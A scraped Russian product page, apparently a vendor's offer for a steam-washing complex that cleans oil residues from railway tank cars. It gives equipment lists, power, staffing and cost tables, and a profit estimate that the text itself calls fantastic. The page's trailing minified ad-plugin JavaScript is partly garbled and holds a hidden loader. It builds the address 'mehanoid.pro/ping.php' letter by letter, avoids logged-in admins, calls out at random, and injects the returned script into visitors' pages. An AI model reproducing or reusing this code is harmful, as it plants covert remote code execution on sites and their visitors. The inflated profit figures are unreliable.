• Собранные в процессе очистки остатки нефтепродуктов используются как вторичное топливо (топливо нефтяное котельное) которое соответствует всем требованиям ТУ.

  • Время промывки одной ж/д цистерны не более 40-50 мин на моющий цикл.
  • Промывочно-пропарочный Комплекс изготавливается «под ключ» и готов к эксплуатации непосредственно после сдачи.
  • Типовой состав оборудования 2-х постового комплекса для обработки от 20 до 40 цистерн в сутки.

1.    Модуль тепловой, реализован в 40-футовом морском, утепленном контейнере:
— парогенератор на 1000 кг пара в час, работающий на СНО, служащий для подачи во внутрь котла цистерны насыщенного пара с химическим реагентом, температура пара до +160С и давление до 6 атм.

Возможно подача пара через моющую головку или непосредственно через герметичную универсальную крышку.
— парогенератор на 1000 кг пара в час – резервный в летний период и вспомогательный в зимний период.
— система подготовки СНО для подачи на мазутную горелку.

— модифицированная мазутная горелка для работы на СНО
— насосная станция, обеспечивающая подачу технологической воды с химическим раствором на моющие головки.

— насос откачки технологической воды с нефтепродуктами из котла цистерны
— система водо- и паропроводов
— шкафы управления парогенераторами
— шкафы управления насосами
— освещение
— главный распределительный шит
— огнетушители для обеспечения норм пожарной безопасности

  1. 2.    Модуль очистки, реализован в 20-футовом утепленном контейнере:
  2. 3.    Модуль хранения ТОВ, реализован в 40-футовом морском, утепленном контейнере:
  3. 4.    Модуль хранения СНО:
  4. 5.    2-е смотровые площадки с ограждением, расположенные по углам модуля Теплового, снабженные лестницами и переходными, опускаемыми трапами, а также размывочными стояками

— система очистки технологической оборотной воды от нефтепродуктов и механических примесей
а) накопительная емкость нефтеочистки – предназначена для разделения нефтепродуктов от технологической воды и накопления ТОВ в объеме необходимом для работы насоса подачи
в) гидроциклоны – служат для удаления из технологической воды механических примесей
г) магнитоимпульсная установка предназначена для обработки ТОВ импульсами магнитного тока, тем самым происходит преобразование воды для полного выделения нефтепродукта из молекул воды
— система очистки СНО от молекуляной воды и подача СНО в систему подготовки для парогенератора
— насос подачи ТОВ – предназначен для подачи ТОВ в систему гидроциклонов и магнитоимпульсной установки
— насос подачи СНО в систему подготовки для парогенератора
— шкаф управления насосами
— шкаф управления магнитоимпульсной установки
— освещение
— огнетушители для обеспечения норм пожарной безопасности
— двукорпусная емкость, заполненная межу копусами этиленгюколем, объемом 35м3 с 2-мя воронками для сбора нефтепродуктов и 2-мя смотровыми лазами. Емкость снабжена регистрами парового нагрева от парогенератора, расположенного в модуле Тепловом и ребрами успокоения технологической воды, а также сливной системой, возможно образующихся нефтепродуктов, в модуль очистки.
— утепленная емкость 70м3 с регистрами пароподогрева для хранения СНО, предназначенного для работы парогенераторов. Имеет верхний люк-лаз, утеплена 100 мм минватой и обита рифленой жестью.
— внешний парогенератор (электродного или тэнового) замкнутого типа (ПГВК).
— пункт выдачи излишков СНО в автомобильный транспорт и/или загрузки темных нефтепродуктов с системой запорных задвижек, измерительного оборудования, счетчиков
6.    Размывочный стояк, оборудованный универсальной герметичной крышкой и 2-х сопловой моющей головкой. Стояк снабжен противовесами для облегчения постановки на цистерну и уборки его на стояночное положение.
7.    Устройства нижнего слива, предназначенные для обеспечения нижнего слива технологической воды с нефтепродуктами или самих нефтепродуктов из котла цистерны. В связи с тем, что в комплексе присутствует емкость для хранения нефтепродуктов, то можно производить слив нефтепродуктов со взливом до 500 мм.
8.    Уличное освещение комплекса светодиодными прожекторами.

(а теперь укажите, что бы вы хотели от сюда убрать….)

Срок изготовления комплекса – 4 месяца с момента поступления денежных средств. Форма оплаты – безналичная.

Окупаемость комплекса

Состав энергопотребляющего оборудования

Наименование
Расчетное потребление
Рабочее потребление
Время работы
Суточное потребление
Электрический котел 45 22 24 528
Электрический котел 45 22 24 528
Напорный насос 7,5 7,5 8 60
Напорный насос 7,5 7,5 8 60
Фекальный насос 5,5 5,5 8 44
Насос перекачки 0,75 0,75 8 6
Насос перекачки 0,75 0,75 8 6
Насос перекачки 5,5 5,5 1 5,5
Насос перекачки 7,5 7,5 0,2 1,5
Насос подпитки 0,5 0,5 24 12
Насос подпитки 1,5 1,5 10 15
Горелка 3,5 2 12 24
МИУ 25 25 24 600
Освещение 2 2 10 20
Бытовое потребление 3 3 24 72
Итого по комплексу 160,5 113 1982

Стоимость электричества 2,4 руб. за 1 кВт

Всего в месяц за элекстичество 142 704,00р.

Штатное расписание комплекса

Наименование должности
Оклад
Количество
Начисление
Директор 56 500р. 1 56 500р.
Мастер 55 200р. 1 55 200р.
Лаборант 48 250р. 3 144 750р.
Оператор 48 250р. 6 289 500р.
Уборщица 24 690р. 1 24 690р.
Прачка 16 780р. 1 16 780р.
Электрик 36 950р. 1 36 950р.
Слесарь 33 560р. 1 33 560р.

Итого фонд заработной платы: 657 930р.

Ежемесячные затраты на комплекс

Наименование
Кол-во
Стоимость за 1ед.
Сумма
Керосин, л. 200 50р. 10 000р.
Ветошь, кг. 50 8 000р. 4 000р.
Молоко,л л 7 500р. 3 500р.
Моющие средства, кг 2 2 500р. 5 000р.
Канцелярия набор 5 000р. 5 000р.

Всего по разделу 27 500 р.

Аренда земли под комплекс 300 кв.м. ежемесячно 73 000р.

Химический реагент ежемесячно 315 000р.

Итого месячные затраты комплекса 1 216 134р

Цистерны на обработку
месяц
150 цистерн
200 цистерн
250 цистерн
450 цистерн
Себестоимость 1 цистерны в рублях 8 107,56р. 6 080,67р. 4 864,54р. 2 702,52р.

При стоимости оказания услуг 9 000,00 р. норма прибыли составляет 6 297,48р. на одну цистерну

Месячный доход паро-промывочного комплекса 2 833 866,00р.

При загруженности комплекса 15 цистерн в сутки прибыль составит 34 006 392р. в год только за услуги по очистке!

А теперь еще один важнейший аспект!

Учитывая,что наш комплекс единственный в своем роде,который позволяет получить низкую обводненость получаемого смывом нефтепродукта (что подтверждается не голословными утверждениями,а горением в  парогенераторе комплекса) Вам не нужно будет тратить деньги на утилизацию,в отличии от других комплексов на рынке! Вы сможете продавать получаемый продукт дополнительно зарабатывая на этом!

Возьмем цистерны в которых перевозится мазут,на котором работает наш парогенератор(опционально может работать на любом топливе)

В цистернах может оставаться около 5 тонн мазута ! За сутки мы получим до 75 тонн топлива или смеси требующей утилизации!

  • Стоимость утилизации порядка 5000р за кубический метр,в каких то регионах возможно дешевле.Пусть будет 3000р
  • Стоимость мазута около 10 000 рублей. Отдаем за треть цены в 3000р
  • Что на выходе?
  • Или Вы покупаете дешевый комплекс и тратите на утилизацию по 225000р в день, или Вы эти деньги зарабатываете!
  • 225000*30 дней=6 750 000 р/мес *12=81 000 000 руб/год

Цифра выглядит фантастично и вызывает сомнения.Вагонов из под мазута может столько не быть,парогенератор тоже потребляет топливо.Ок,давайте разделим на 10!

Но это тоже отличная прибыль окупающая вложения, а не ежегодный расход на утилизацию!

Источник: http://scanjetrussland.ru/tovar/moechnyy-kompleks-dlya-ochistki-vnutrennih-poverhnostey-jeleznodorojnyh-cistern-ot-ostatkov-nefteproduktov/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};